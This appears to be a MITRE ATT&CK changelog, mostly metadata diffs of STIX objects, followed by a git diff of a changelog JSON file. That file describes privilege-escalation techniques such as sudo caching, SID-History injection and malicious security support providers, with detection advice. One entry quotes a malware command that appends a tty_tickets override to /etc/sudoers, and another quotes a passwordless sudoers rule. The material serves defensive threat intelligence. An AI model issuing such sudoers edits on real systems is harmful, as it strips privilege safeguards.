dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.404000+00:002025-04-25 14:49:36.307000+00:00

[G1017] Volt Typhoon

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2024-05-21 20:12:20.029000+00:002025-04-30 13:27:45.018000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsVlad Shumaher, Palo Alto Networks

[G0124] Windigo

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.164000+00:002025-04-25 14:49:09.909000+00:00

[G0018] admin@338

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.261000+00:002025-04-25 14:48:47.886000+00:00

mobile-attack

Patches

[G0096] APT41

Current version: 4.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-10-10 14:31:35.326000+00:002025-04-22 21:56:33.318000+00:00

[G0097] Bouncing Golf

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:02.103000+00:002025-04-25 14:41:32.241000+00:00

[G1004] LAPSUS$

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-07 14:44:59.715000+00:002025-04-21 19:40:47.538000+00:00
x_mitre_contributors[2]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

Campaigns

enterprise-attack

Patches

[C0018] C0018

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:46.763000+00:002025-04-21 19:40:47.537000+00:00
x_mitre_contributors[0]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

Mitigations

mobile-attack

Patches

[M1002] Attestation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:19.448000+00:002025-04-25 14:40:12.762000+00:00

[M1010] Deploy Compromised Device Detection Method

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:19.136000+00:002025-04-25 14:40:12.032000+00:00

[M1009] Encrypt Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.668000+00:002025-04-25 14:40:10.924000+00:00

[M1012] Enterprise Policy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.032000+00:002025-04-25 14:40:09.487000+00:00

[M1003] Lock Bootloader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.821000+00:002025-04-25 14:40:11.299000+00:00

[M1001] Security Updates

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.982000+00:002025-04-25 14:40:11.661000+00:00

[M1004] System Partition Integrity

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.484000+00:002025-04-25 14:40:10.556000+00:00

[M1006] Use Recent OS Version

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.864000+00:002025-04-25 14:40:08.756000+00:00

[M1011] User Guidance

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:18.181000+00:002025-04-25 14:40:09.845000+00:00

ics-attack

Patches

[M0915] Active Directory Configuration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:26.911000+00:002025-04-25 14:39:12.577000+00:00

[M0803] Data Loss Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:27.444000+00:002025-04-25 14:39:13.297000+00:00

[M0805] Mechanical Protection Layers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:29.910000+00:002025-04-25 14:39:16.894000+00:00

[M0816] Mitigation Limited or Not Effective

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:27.652000+00:002025-04-25 14:39:13.833000+00:00

[M0809] Operational Information Confidentiality

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:30.453000+00:002025-04-25 14:39:17.799000+00:00

[M0920] SSL/TLS Inspection

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:28.819000+00:002025-04-25 14:39:15.463000+00:00

[M0812] Safety Instrumented Systems

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:32.513000+00:002025-04-25 14:39:20.300000+00:00

[M0919] Threat Intelligence Program

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:32.342000+00:002025-04-25 14:39:19.937000+00:00

[M0815] Watchdog Timers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:30.248000+00:002025-04-25 14:39:17.436000+00:00

Data Sources

enterprise-attack

Patches

[DS0026] Active Directory

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.450Z2025-04-25T14:49:52.686Z

[DS0015] Application Log

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.207Z2025-04-25T14:40:03.068Z

[DS0037] Certificate

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.496Z2025-04-25T14:49:54.643Z

[DS0038] Domain Name

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.900Z2025-04-25T14:49:57.359Z

[DS0016] Drive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:29.888Z2025-04-25T14:40:06.700Z

[DS0027] Driver

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.930Z2025-04-25T14:49:53.761Z

[DS0018] Firewall

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.372Z2025-04-25T14:49:58.457Z

[DS0001] Firmware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:49.401Z2025-04-25T14:40:07.251Z

[DS0036] Group

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.972Z2025-04-25T14:49:55.737Z

[DS0007] Image

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.122Z2025-04-25T14:49:56.103Z

[DS0035] Internet Scan

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.675Z2025-04-25T14:49:51.440Z

[DS0008] Kernel

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.054Z2025-04-25T14:49:57.731Z

[DS0011] Module

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:13.134Z2025-04-25T14:40:06.151Z

[DS0023] Named Pipe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:09.639Z2025-04-25T14:49:53.223Z

[DS0033] Network Share

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:58.319Z2025-04-25T14:40:03.613Z

[DS0021] Persona

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.210Z2025-04-25T14:49:58.095Z

[DS0014] Pod

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:12.521Z2025-04-25T14:49:58.983Z

[DS0003] Scheduled Job

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:33.637Z2025-04-25T14:40:05.238Z

[DS0019] Service

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:47.833Z2025-04-25T14:40:04.346Z

[DS0020] Snapshot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.827Z2025-04-25T14:49:55.198Z

[DS0005] WMI

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:11.750Z2025-04-25T14:49:56.995Z

[DS0006] Web Credential

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.491Z2025-04-25T14:49:51.076Z

[DS0024] Windows Registry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.970Z2025-04-25T14:40:05.783Z

ics-attack

Patches

[DS0015] Application Log

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:10.207Z2025-04-25T14:40:03.068Z

[DS0016] Drive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:29.888Z2025-04-25T14:40:06.700Z

[DS0001] Firmware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:49.401Z2025-04-25T14:40:07.251Z

[DS0011] Module

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:13.134Z2025-04-25T14:40:06.151Z

[DS0033] Network Share

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:58.319Z2025-04-25T14:40:03.613Z

[DS0003] Scheduled Job

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:33.637Z2025-04-25T14:40:05.238Z

[DS0019] Service

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:47.833Z2025-04-25T14:40:04.346Z

[DS0024] Windows Registry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T20:39:08.970Z2025-04-25T14:40:05.783Z

Data Components

enterprise-attack

Patches

Image: Image Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:16:02.863Z2025-04-25T14:49:48.777Z

Instance: Instance Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:01.557Z2025-04-25T14:48:42.003Z

Logon Session: Logon Session Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:23.075Z2025-04-25T14:39:59.118Z

Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:39.543Z2025-04-25T14:39:56.271Z

Service: Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:51.004Z2025-04-25T14:39:52.137Z

Snapshot: Snapshot Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:15:14.954Z2025-04-25T14:49:42.387Z

User Account: User Account Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:09:47.932Z2025-04-25T14:49:17.060Z

Volume: Volume Enumeration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:22.350Z2025-04-25T14:49:47.887Z

Volume: Volume Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:15.849Z2025-04-25T14:49:38.106Z

Volume: Volume Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:17:12.667Z2025-04-25T14:49:35.774Z

Web Credential: Web Credential Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:30.118Z2025-04-25T14:49:08.104Z

Web Credential: Web Credential Usage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:13:26.927Z2025-04-25T14:48:47.351Z

ics-attack

Patches

Operational Databases: Device Alarm

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.998Z2025-04-25T14:39:55.892Z

Logon Session: Logon Session Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:12:23.075Z2025-04-25T14:39:59.118Z

Operational Databases: Process History/Live Data

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.842Z2025-04-25T14:39:54.996Z

Operational Databases: Process/Event Alarm

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16T21:26:36.694Z2025-04-25T14:39:52.496Z

Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:11:39.543Z2025-04-25T14:39:56.271Z

Service: Service Metadata

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-18T15:10:51.004Z2025-04-25T14:39:52.137Z
+ + + \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json b/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json new file mode 100644 index 00000000000..260a8539b5b --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/changelog.json @@ -0,0 +1,27124 @@ +{ + "enterprise-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-30 14:34:44.992000+00:00", + "modified": "2025-04-25 14:45:52.996000+00:00", + "name": "Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/003", + "external_id": "T1548.003" + }, + { + "source_name": "sudo man page 2018", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "url": "https://www.sudo.ws/" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + }, + { + "source_name": "cybereason osx proton", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation", + "Process: Process Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:52.996000+00:00\", \"old_value\": \"2025-04-15 19:58:08.135000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1026: Privileged Account Management", + "M1028: Operating System Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0009: Process (Process Metadata)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-18 18:34:49.414000+00:00", + "modified": "2025-04-25 14:47:45.982000+00:00", + "name": "SID-History Injection", + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/005", + "external_id": "T1134.005" + }, + { + "source_name": "Microsoft SID", + "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" + }, + { + "source_name": "Microsoft SID-History Attribute", + "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms679833.aspx" + }, + { + "source_name": "Microsoft Well Known SIDs Jun 2017", + "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", + "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" + }, + { + "source_name": "Microsoft Get-ADUser", + "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", + "url": "https://technet.microsoft.com/library/ee617241.aspx" + }, + { + "source_name": "AdSecurity SID History Sept 2015", + "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", + "url": "https://adsecurity.org/?p=1772" + }, + { + "source_name": "Microsoft DsAddSidHistory", + "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms677982.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alain Homewood, Insomnia Security", + "Vincent Le Toux" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Object Modification", + "Process: OS API Execution", + "User Account: User Account Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:45.982000+00:00\", \"old_value\": \"2025-04-15 19:59:00.556000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1015: Active Directory Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0002: User Account (User Account Metadata)", + "DS0009: Process (OS API Execution)", + "DS0026: Active Directory (Active Directory Object Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 17:16:11.806000+00:00", + "modified": "2025-04-25 14:46:38.641000+00:00", + "name": "Security Support Provider", + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/005", + "external_id": "T1547.005" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution 